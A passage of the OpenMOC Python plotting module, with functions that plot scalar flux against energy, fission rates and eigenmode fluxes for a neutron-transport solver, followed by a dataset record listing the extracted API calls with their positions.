plt.colorbar()
plt.suptitle('FSR Scalar Flux (Group {0})'.format(group))
plt.title('z = ' + str(zcoord))
filename = directory + 'fsr-flux-group-' + str(group) + '-z-' + \
str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method takes in a Solver object and plots the scalar
# flux vs. energy for one or more flat source regions.
# @details The Solver must have converged the flat source sources prior to
# calling this routine. The routine will generate a step plot of the
# flat flux across each energy group.
#
# An optional parameter for the energy group bounds may be input.
# The group bounds should be input in increasing order of energy.
# If group bounds are not specified, the routine will use equal
# width steps for each energy group.
#
# A user may invoke this function from an OpenMOC Python file
# as follows:
#
# @code
# openmoc.plotter.plot_energy_fluxes(solver, fsrs=[1,5,20],
# group_bounds=[0., 0.625, 2e7])
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param fsrs the flat source region IDs of interest
# @param group_bounds an optional Python list of the energy group bounds (eV)
# @param norm a boolean indicating whether to normalize the flux
# @param loglog boolean indicating whether to plot use a log-log scale
def plot_energy_fluxes(solver, fsrs, group_bounds=None, norm=True, loglog=True):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the flux vs. energy ' + \
'since input did not contain a Solver class object')
geometry = solver.getGeometry()
num_fsrs = geometry.getNumFSRs()
num_groups = geometry.getNumEnergyGroups()
if isinstance(fsrs, (tuple, list, np.ndarray)):
for fsr in fsrs:
if not is_integer(fsr):
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %s which is not an int', str(fsr))
elif fsr < 0:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %d which is less than zero', fsr)
elif fsr >= num_fsrs:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs contains %d which is greater than the ' + \
'total number of FSRs %d', fsr, num_fsrs)
else:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the fsrs is not a Python tuple, list or NumPy array')
if isinstance(group_bounds, (tuple, list, np.ndarray)):
if not all(low < up for low, up in zip(group_bounds, group_bounds[1:])):
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'energy group bounds are not monotonically increasing')
elif len(group_bounds) != geometry.getNumEnergyGroups()+1:
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'group bounds does not correspond to %d groups', num_groups)
for bound in group_bounds:
if not is_integer(bound) and not is_float(bound):
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'group bounds contains %s which is not a number', str(fsr))
elif bound < 0:
py_printf('ERROR', 'Unable to plot the flux vs. energy since the ' + \
'group bounds contains %f which is less than zero', bound)
elif group_bounds is None:
group_bounds = np.arange(num_groups+1, dtype=np.int)
loglog = False
else:
py_printf('ERROR', 'Unable to plot the flux vs. energy since ' + \
'the group bounds is not a Python tuple, list or NumPy array')
py_printf('NORMAL', 'Plotting the scalar fluxes vs. energy...')
# Compute difference in energy bounds for each group
group_deltas = np.ediff1d(group_bounds)
group_bounds = np.flipud(group_bounds)
group_deltas = np.flipud(group_deltas)
# Iterate over all flat source regions
for fsr in fsrs:
# Allocate memory for an array of this FSR's fluxes
fluxes = np.zeros(num_groups, dtype=np.float)
# Extract the flux in each energy group
for group in range(num_groups):
fluxes[group] = solver.getFlux(fsr, group+1)
# Normalize fluxes to the total integrated flux
if norm:
fluxes /= np.sum(group_deltas * fluxes)
# Initialize a separate plot for this FSR's fluxes
fig = plt.figure()
# Draw horizontal/vertical lines on the plot for each energy group
for group in range(num_groups):
# Horizontal line
if loglog:
plt.loglog(group_bounds[group:group+2], [fluxes[group]]*2,
linewidth=3, c='b', label='openmoc', linestyle='-')
else:
plt.plot(group_bounds[group:group+2], [fluxes[group]]*2,
linewidth=3, c='b', label='openmoc', linestyle='-')
# Vertical lines
if group < num_groups - 1:
if loglog:
plt.loglog([group_bounds[group+1]]*2, fluxes[group:group+2],
c='b', linestyle='--')
else:
plt.plot([group_bounds[group+1]]*2, fluxes[group:group+2],
c='b', linestyle='--')
plt.xlabel('Energy')
plt.ylabel('Flux')
plt.xlim((min(group_bounds), max(group_bounds)))
plt.grid()
plt.title('FSR {0} Flux ({1} groups)'.format(fsr, num_groups))
filename = directory + 'flux-fsr-' + str(fsr) + '.png'
plt.savefig(filename, bbox_inches='tight')
plt.close(fig)
##
# @brief This method plots a color-coded 2D surface plot representing the
# FSR fission rates in the Geometry.
# @details The Solver must have converged the flat source sources prior to
# calling this routine. A user may invoke this function from an
# OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_fission_rates(solver)
# @endcode
#
# @param solver a Solver object that has converged the source for the Geometry
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
def plot_fission_rates(solver, gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'Solver' in str(type(solver)):
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'since input did not contain a solver class object')
if not is_integer(gridsize):
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'since the gridsize %s is not an integer', str(gridsize))
if gridsize <= 0:
py_printf('ERROR', 'Unable to plot the fission rates ' + \
'with a negative gridsize (%d)', gridsize)
py_printf('NORMAL', 'Plotting the flat source region fission rates...')
# Get geometry
geometry = solver.getGeometry()
# Compute the volume-weighted fission rates for each FSR
fission_rates = solver.computeFSRFissionRates(geometry.getNumFSRs())
# Initialize a numpy array of fission rates
surface = numpy.zeros((gridsize, gridsize))
# Retrieve the pixel coordinates
coords = get_pixel_coords(geometry, gridsize, xlim, ylim)
# Get the Geometry's z-coord
zcoord = geometry.getFSRPoint(0).getZ()
for i in range(gridsize):
for j in range(gridsize):
# Find the flat source region IDs for each grid point
x = coords['y'][i]
y = coords['x'][j]
point = openmoc.LocalCoords(x, y, zcoord)
point.setUniverse(geometry.getRootUniverse())
geometry.findCellContainingCoords(point)
fsr_id = geometry.getFSRId(point)
# If we did not find a region for this region, use a -1 "bad" number color
if np.isnan(fsr_id):
surface[j][i] = -1
# Get the fission rate in this FSR
else:
surface[j][i] = fission_rates[fsr_id]
# Plot a 2D color map of the flat source regions fission rates
fig = plt.figure()
plt.imshow(np.flipud(surface), extent=coords['bounds'])
plt.colorbar()
plt.suptitle('Flat Source Region Fission Rates')
plt.title('z = ' + str(zcoord))
filename = directory + 'fission-rates-z-' + str(zcoord) + '.png'
fig.savefig(filename, bbox_inches='tight')
##
# @brief This method plots a color-coded 2D surface plot representing the
# FSR scalar fluxes for various eigenmodes from an IRAMSolver.
# @details The IRAMSolver must have computed the eigenmodes prior to
# calling this routine. A user may invoke this function from
# an OpenMOC Python file as follows:
#
# @code
# openmoc.plotter.plot_eigenmode_fluxes(iramsolver, energy_groups=[1,7])
# @endcode
#
# @param iramsolver an IRAMSolver object that has computed the eigenmodes
# @param eigenmodes a Python list of integer eigenmodes to plot
# @param energy_groups a Python list of integer energy groups to plot
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
def plot_eigenmode_fluxes(iramsolver, eigenmodes=[], energy_groups=[1],
gridsize=250, xlim=None, ylim=None):
global subdirectory
directory = openmoc.get_output_directory() + subdirectory
# Make directory if it does not exist
if not os.path.exists(directory):
os.makedirs(directory)
if not 'IRAMSolver' in str(type(iramsolver)):
py_printf('ERROR', 'Unable to plot the eigenmode fluxes ' + \
'since input did not contain an IRAMSolver class object')
if isinstance(eigenmodes, (list, tuple, np.ndarray)):
# If eigenmodes parameters is empty list, plot all eigenmodes
if len(eigenmodes) == 0:
eigenmodes = np.arange(1, iramsolver._num_modes+1)
for mode in eigenmodes:
if not is_integer(mode):
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes contains %s which is not a number', str(mode))
elif mode <= 0:
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes contains %d which is negative', mode)
elif mode > iramsolver._num_modes:
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes contains %d but the IRAMSolver only ' + \
'computed %d modes', mode)
else:
py_printf('ERROR', 'Unable to plot the eigenmode flux since the ' + \
'eigenmodes is not a Python tuple/list or NumPy array')
py_printf('NORMAL', 'Plotting the eigenmode fluxes...')
# Extract the MOC Solver from the IRAMSolver
moc_solver = iramsolver._moc_solver
# Loop over each eigenmode
for mode in eigenmodes:
# Extract the eigenvector for this eigenmode from the IRAMSolver
eigenvec = iramsolver._eigenvectors[:,mode-1]
# Convert it into a form that SWIG will be happy with
eigenvec = np.squeeze(np.ascontiguousarray(eigenvec))
eigenvec = np.real(eigenvec).astype(iramsolver._precision)
# Ensure the primary eigenvector is positive
if(mode-1 == 0):
eigenvec = np.abs(eigenvec)
# Insert eigenvector into MOC Solver object
moc_solver.setFluxes(eigenvec)
# Set subdirectory folder for this eigenmode
num_digits = len(str(max(eigenmodes)))
subdirectory = '/plots/eig-{0}-flux/'.format(str(mode).zfill(num_digits))
# Plot this eigenmode's spatial fluxes
plot_spatial_fluxes(moc_solver, energy_groups, gridsize, xlim, ylim)
# Reset global subdirectory
subdirectory = '/plots/'
##
# @brief This is a helper method to define coordinates for a plotting window.
# @details This routine builds a coordinate surface map for the plotting
# window defined for by the user. If no window was defined, then
# this routine uses the outer bounding box around the geometry as
# the plotting window.
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param gridsize an optional number of grid cells for the plot
# @param xlim optional list/tuple of the minimim/maximum x-coordinates
# @param ylim optional list/tuple of the minimim/maximum y-coordinates
# @return a dictionary with the plotting window map and bounding box
def get_pixel_coords(geometry, gridsize, xlim, ylim):
# initialize variables to be returned
bounds = [geometry.getMinX() + TINY_MOVE, geometry.getMaxX() - TINY_MOVE,
geometry.getMinY() + TINY_MOVE, geometry.getMaxY() - TINY_MOVE]
xcoords = None
ycoords = None
coords = dict()
if not xlim is None:
bounds[0] = xlim[0]
bounds[1] = xlim[1]
if not ylim is None:
bounds[2] = ylim[0]
bounds[3] = ylim[1]
xcoords = np.linspace(bounds[0], bounds[1], gridsize)
ycoords = np.linspace(bounds[2], bounds[3], gridsize)
# add attributes to coords dictionary
coords['x'] = xcoords
coords['y'] = ycoords
coords['bounds'] = bounds
return coords
##
# @brief This is a helper method to check that z-coord falls within the bounds
# of the geometry.
# @param geometry a Geometry object which has been initialized with Materials,
# Cells, Universes and Lattices
# @param zcoord the z coordinate
def check_zcoord(geometry, zcoord):
if not is_float(zcoord):
py_printf('ERROR', 'Unable to produce plot since ' + \
'the z-coord %d is not a float', zcoord)
elif zcoord < geometry.getMinZ() or zcoord > geometry.getMaxZ():
py_printf('ERROR', 'Unable to produce plot since ' + \
'the z-coord %d is outside the geometry z-bounds (%d, %d)', \
geometry.getMinZ(), geometry.getMaxZ())
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.loglog",
"numpy.sum",
"numpy.abs",
"matplotlib.pyplot.suptitle",
"numpy.isnan",
"matplotlib.pyplot.figure",
"numpy.arange",
"numpy.unique",
"openmoc.get_output_directory",
"matplotlib.pyplot.close",
"matplotlib.pyplot.imshow",
"matplotlib.cm.ScalarMappable",
"os.path.exists",
"matplotlib.pyplot.colorbar",
"numpy.linspace",
"numpy.real",
"numpy.random.shuffle",
"matplotlib.markers.MarkerStyle",
"matplotlib.pyplot.get_cmap",
"numpy.flipud",
"matplotlib.use",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.grid",
"os.makedirs",
"matplotlib.pyplot.ioff",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"numpy.where",
"numpy.array",
"matplotlib.pyplot.xlabel",
"numpy.ascontiguousarray",
"openmoc.LocalCoords",
"matplotlib.pyplot.savefig",
"numpy.ediff1d"
] |
[((486, 507), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (500, 507), False, 'import matplotlib\n'), ((898, 908), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (906, 908), True, 'import matplotlib.pyplot as plt\n'), ((2455, 2471), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (2463, 2471), True, 'import numpy as np\n'), ((2597, 2609), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2607, 2609), True, 'import matplotlib.pyplot as plt\n'), ((2868, 2884), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (2877, 2884), True, 'import matplotlib.pyplot as plt\n'), ((3038, 3052), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (3047, 3052), True, 'import matplotlib.pyplot as plt\n'), ((4676, 4692), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (4684, 4692), True, 'import numpy as np\n'), ((5355, 5402), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'num_fsrs'], {'endpoint': '(False)'}), '(0.0, 1.0, num_fsrs, endpoint=False)\n', (5366, 5402), True, 'import numpy as np\n'), ((5492, 5504), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (5502, 5504), True, 'import matplotlib.pyplot as plt\n'), ((6053, 6075), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['suptitle'], {}), '(suptitle)\n', (6065, 6075), True, 'import matplotlib.pyplot as plt\n'), ((6078, 6094), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (6087, 6094), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6284), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (6279, 6284), True, 'import matplotlib.pyplot as plt\n'), ((9196, 9226), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)'], {}), '((gridsize, gridsize))\n', (9204, 9226), True, 'import numpy as np\n'), ((9249, 9267), 'numpy.unique', 'np.unique', (['surface'], {}), '(surface)\n', (9258, 9267), True, 'import numpy as np\n'), ((9477, 9501), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (9489, 9501), True, 'import matplotlib.pyplot as plt\n'), ((9578, 9590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9588, 9590), True, 'import matplotlib.pyplot as plt\n'), ((9602, 9619), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (9611, 9619), True, 'import numpy as np\n'), ((9622, 9734), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_materials'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_materials)\n", (9632, 9734), True, 'import matplotlib.pyplot as plt\n'), ((9745, 9770), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Materials"""'], {}), "('Materials')\n", (9757, 9770), True, 'import matplotlib.pyplot as plt\n'), ((9915, 9929), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (9924, 9929), True, 'import matplotlib.pyplot as plt\n'), ((11688, 11731), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)', 'numpy.int64'], {}), '((gridsize, gridsize), numpy.int64)\n', (11696, 11731), True, 'import numpy as np\n'), ((12730, 12760), 'numpy.zeros', 'np.zeros', (['(gridsize, gridsize)'], {}), '((gridsize, gridsize))\n', (12738, 12760), True, 'import numpy as np\n'), ((12779, 12797), 'numpy.unique', 'np.unique', (['surface'], {}), '(surface)\n', (12788, 12797), True, 'import numpy as np\n'), ((12995, 13019), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (13007, 13019), True, 'import matplotlib.pyplot as plt\n'), ((13092, 13104), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (13102, 13104), True, 'import matplotlib.pyplot as plt\n'), ((13116, 13133), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (13125, 13133), True, 'import numpy as np\n'), ((13136, 13244), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_cells'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_cells)\n", (13146, 13244), True, 'import matplotlib.pyplot as plt\n'), ((13255, 13276), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Cells"""'], {}), "('Cells')\n", (13267, 13276), True, 'import matplotlib.pyplot as plt\n'), ((13418, 13432), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (13427, 13432), True, 'import matplotlib.pyplot as plt\n'), ((17840, 17875), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (17849, 17875), True, 'import numpy as np\n'), ((17891, 17926), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (17900, 17926), True, 'import numpy as np\n'), ((17952, 17980), 'numpy.random.shuffle', 'np.random.shuffle', (['id_colors'], {}), '(id_colors)\n', (17969, 17980), True, 'import numpy as np\n'), ((18000, 18035), 'numpy.arange', 'np.arange', (['num_fsrs'], {'dtype': 'np.int64'}), '(num_fsrs, dtype=np.int64)\n', (18009, 18035), True, 'import numpy as np\n'), ((18202, 18226), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (18214, 18226), True, 'import matplotlib.pyplot as plt\n'), ((18313, 18325), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18323, 18325), True, 'import matplotlib.pyplot as plt\n'), ((18337, 18354), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (18346, 18354), True, 'import numpy as np\n'), ((18357, 18464), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap', 'vmin': '(0)', 'vmax': 'num_fsrs'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=\n cmap, vmin=0, vmax=num_fsrs)\n", (18367, 18464), True, 'import matplotlib.pyplot as plt\n'), ((19099, 19134), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Flat Source Regions"""'], {}), "('Flat Source Regions')\n", (19111, 19134), True, 'import matplotlib.pyplot as plt\n'), ((19289, 19303), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (19298, 19303), True, 'import matplotlib.pyplot as plt\n'), ((22857, 22898), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (22866, 22898), True, 'import numpy as np\n'), ((22914, 22955), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (22923, 22955), True, 'import numpy as np\n'), ((22981, 23009), 'numpy.random.shuffle', 'np.random.shuffle', (['id_colors'], {}), '(id_colors)\n', (22998, 23009), True, 'import numpy as np\n'), ((23029, 23070), 'numpy.arange', 'np.arange', (['num_cmfd_cells'], {'dtype': 'np.int64'}), '(num_cmfd_cells, dtype=np.int64)\n', (23038, 23070), True, 'import numpy as np\n'), ((23237, 23261), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""spectral"""'], {}), "('spectral')\n", (23249, 23261), True, 'import matplotlib.pyplot as plt\n'), ((23339, 23351), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23349, 23351), True, 'import matplotlib.pyplot as plt\n'), ((23363, 23380), 'numpy.flipud', 'np.flipud', (['colors'], {}), '(colors)\n', (23372, 23380), True, 'import numpy as np\n'), ((23383, 23462), 'matplotlib.pyplot.imshow', 'plt.imshow', (['colors'], {'extent': "coords['bounds']", 'interpolation': '"""nearest"""', 'cmap': 'cmap'}), "(colors, extent=coords['bounds'], interpolation='nearest', cmap=cmap)\n", (23393, 23462), True, 'import matplotlib.pyplot as plt\n'), ((23478, 23501), 'matplotlib.pyplot.title', 'plt.title', (['"""CMFD cells"""'], {}), "('CMFD cells')\n", (23487, 23501), True, 'import matplotlib.pyplot as plt\n'), ((31604, 31628), 'numpy.ediff1d', 'np.ediff1d', (['group_bounds'], {}), '(group_bounds)\n', (31614, 31628), True, 'import numpy as np\n'), ((31646, 31669), 'numpy.flipud', 'np.flipud', (['group_bounds'], {}), '(group_bounds)\n', (31655, 31669), True, 'import numpy as np\n'), ((31687, 31710), 'numpy.flipud', 'np.flipud', (['group_deltas'], {}), '(group_deltas)\n', (31696, 31710), True, 'import numpy as np\n'), ((35871, 35883), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (35881, 35883), True, 'import matplotlib.pyplot as plt\n'), ((35944, 35958), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (35956, 35958), True, 'import matplotlib.pyplot as plt\n'), ((35961, 36009), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Flat Source Region Fission Rates"""'], {}), "('Flat Source Region Fission Rates')\n", (35973, 36009), True, 'import matplotlib.pyplot as plt\n'), ((40738, 40781), 'numpy.linspace', 'np.linspace', (['bounds[0]', 'bounds[1]', 'gridsize'], {}), '(bounds[0], bounds[1], gridsize)\n', (40749, 40781), True, 'import numpy as np\n'), ((40794, 40837), 'numpy.linspace', 'np.linspace', (['bounds[2]', 'bounds[3]', 'gridsize'], {}), '(bounds[2], bounds[3], gridsize)\n', (40805, 40837), True, 'import numpy as np\n'), ((1516, 1546), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (1544, 1546), False, 'import openmoc\n'), ((1612, 1637), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (1626, 1637), False, 'import os\n'), ((1643, 1665), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (1654, 1665), False, 'import os\n'), ((2644, 2710), 'matplotlib.pyplot.plot', 'plt.plot', (['[x[i * 2], x[i * 2 + 1]]', '[y[i * 2], y[i * 2 + 1]]', '"""b-"""'], {}), "([x[i * 2], x[i * 2 + 1]], [y[i * 2], y[i * 2 + 1]], 'b-')\n", (2652, 2710), True, 'import matplotlib.pyplot as plt\n'), ((3643, 3673), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (3671, 3673), False, 'import openmoc\n'), ((3739, 3764), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (3753, 3764), False, 'import os\n'), ((3770, 3792), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (3781, 3792), False, 'import os\n'), ((5604, 5623), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""jet"""'], {}), "('jet')\n", (5616, 5623), True, 'import matplotlib.pyplot as plt\n'), ((5699, 5729), 'matplotlib.cm.ScalarMappable', 'cmx.ScalarMappable', ([], {'norm': 'cNorm'}), '(norm=cNorm)\n', (5717, 5729), True, 'import matplotlib.cm as cmx\n'), ((5795, 5864), 'matplotlib.pyplot.plot', 'plt.plot', (['[x[i * 2], x[i * 2 + 1]]', '[y[i * 2], y[i * 2 + 1]]'], {'c': 'color'}), '([x[i * 2], x[i * 2 + 1]], [y[i * 2], y[i * 2 + 1]], c=color)\n', (5803, 5864), True, 'import matplotlib.pyplot as plt\n'), ((7235, 7265), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (7263, 7265), False, 'import openmoc\n'), ((7331, 7356), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (7345, 7356), False, 'import os\n'), ((7362, 7384), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (7373, 7384), False, 'import os\n'), ((9327, 9359), 'numpy.where', 'np.where', (['(surface == material_id)'], {}), '(surface == material_id)\n', (9335, 9359), True, 'import numpy as np\n'), ((10867, 10897), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (10895, 10897), False, 'import openmoc\n'), ((10963, 10988), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (10977, 10988), False, 'import os\n'), ((10994, 11016), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (11005, 11016), False, 'import os\n'), ((12849, 12877), 'numpy.where', 'np.where', (['(surface == cell_id)'], {}), '(surface == cell_id)\n', (12857, 12877), True, 'import numpy as np\n'), ((14751, 14781), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (14779, 14781), False, 'import openmoc\n'), ((14847, 14872), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (14861, 14872), False, 'import os\n'), ((14878, 14900), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (14889, 14900), False, 'import os\n'), ((18745, 18833), 'matplotlib.pyplot.scatter', 'plt.scatter', (['centroids_x', 'centroids_y'], {'color': '"""k"""', 'marker': 'marker_type', 's': 'marker_size'}), "(centroids_x, centroids_y, color='k', marker=marker_type, s=\n marker_size)\n", (18756, 18833), True, 'import matplotlib.pyplot as plt\n'), ((20672, 20702), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (20700, 20702), False, 'import openmoc\n'), ((20768, 20793), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (20782, 20793), False, 'import os\n'), ((20799, 20821), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (20810, 20821), False, 'import os\n'), ((24535, 24565), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (24563, 24565), False, 'import openmoc\n'), ((24631, 24656), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (24645, 24656), False, 'import os\n'), ((24662, 24684), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (24673, 24684), False, 'import os\n'), ((27325, 27337), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (27335, 27337), True, 'import matplotlib.pyplot as plt\n'), ((27412, 27426), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (27424, 27426), True, 'import matplotlib.pyplot as plt\n'), ((27682, 27696), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (27691, 27696), True, 'import matplotlib.pyplot as plt\n'), ((29034, 29064), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (29062, 29064), False, 'import openmoc\n'), ((29130, 29155), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (29144, 29155), False, 'import os\n'), ((29161, 29183), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (29172, 29183), False, 'import os\n'), ((31843, 31879), 'numpy.zeros', 'np.zeros', (['num_groups'], {'dtype': 'np.float'}), '(num_groups, dtype=np.float)\n', (31851, 31879), True, 'import numpy as np\n'), ((32192, 32204), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (32202, 32204), True, 'import matplotlib.pyplot as plt\n'), ((32968, 32988), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Energy"""'], {}), "('Energy')\n", (32978, 32988), True, 'import matplotlib.pyplot as plt\n'), ((32993, 33011), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Flux"""'], {}), "('Flux')\n", (33003, 33011), True, 'import matplotlib.pyplot as plt\n'), ((33069, 33079), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (33077, 33079), True, 'import matplotlib.pyplot as plt\n'), ((33210, 33252), 'matplotlib.pyplot.savefig', 'plt.savefig', (['filename'], {'bbox_inches': '"""tight"""'}), "(filename, bbox_inches='tight')\n", (33221, 33252), True, 'import matplotlib.pyplot as plt\n'), ((33257, 33271), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (33266, 33271), True, 'import matplotlib.pyplot as plt\n'), ((34055, 34085), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (34083, 34085), False, 'import openmoc\n'), ((34151, 34176), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (34165, 34176), False, 'import os\n'), ((34182, 34204), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (34193, 34204), False, 'import os\n'), ((35897, 35915), 'numpy.flipud', 'np.flipud', (['surface'], {}), '(surface)\n', (35906, 35915), True, 'import numpy as np\n'), ((37184, 37214), 'openmoc.get_output_directory', 'openmoc.get_output_directory', ([], {}), '()\n', (37212, 37214), False, 'import openmoc\n'), ((37280, 37305), 'os.path.exists', 'os.path.exists', (['directory'], {}), '(directory)\n', (37294, 37305), False, 'import os\n'), ((37311, 37333), 'os.makedirs', 'os.makedirs', (['directory'], {}), '(directory)\n', (37322, 37333), False, 'import os\n'), ((8443, 8476), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (8462, 8476), False, 'import openmoc\n'), ((11995, 12028), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, zcoord)\n', (12014, 12028), False, 'import openmoc\n'), ((17060, 17093), 'openmoc.LocalCoords', 'openmoc.LocalCoords', (['x', 'y', 'zcoord'], {}), '(x, y, 